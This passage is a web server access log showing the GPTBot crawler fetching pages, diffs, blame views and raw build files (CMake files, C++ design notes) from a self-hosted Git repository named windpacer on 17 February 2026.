192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" +[17/Feb/2026:17:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176813] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" +[17/Feb/2026:17:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 169504] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" +[17/Feb/2026:17:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23945] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" +[17/Feb/2026:17:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56429] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" +[17/Feb/2026:17:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176810] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" +[17/Feb/2026:17:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 10852] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23942] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" +[17/Feb/2026:17:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176818] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" +[17/Feb/2026:17:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport_error.hpp" [Client 74.7.227.38] [Length 18549] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport_state.hpp" [Client 74.7.227.38] [Length 23136] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport_error.hpp" [Client 74.7.227.38] [Length 24961] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:17:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10097] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11489] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11187] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13301] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15260] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11169] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:17:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11169] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:17:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11491] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fCMakeLists.txt" [Client 74.7.227.38] [Length 25135] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10526] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10097] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:17:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10014] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:17:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10526] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14256] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10091] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:17:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14250] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10090] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:17:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14033] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 